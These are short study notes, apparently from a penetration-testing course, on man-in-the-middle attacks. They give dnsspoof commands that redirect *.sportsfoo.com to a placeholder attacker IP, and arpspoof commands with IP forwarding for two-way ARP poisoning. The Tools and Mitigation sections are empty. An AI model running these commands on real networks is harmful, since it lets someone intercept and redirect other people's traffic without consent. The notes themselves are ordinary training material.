MITM attack

Pasted image 20230908214558.png

DNS poisoning

Create a file to emulate DNS record

echo "ATTAQUER_IP *.sportsfoo.com" > dns
dnsspoof -i eth1 -f dns

ARP poisoning

echo 1 > /proc/sys/net/ipv4/ip forward
Option Description
arpspoof -i interface -t IP1 IP2
arpspoof -i interface -t IP2 IP1
IP1 is the address of the access point or gateway
IP2 is the target system

Cain & Abel

Tools

Mitigation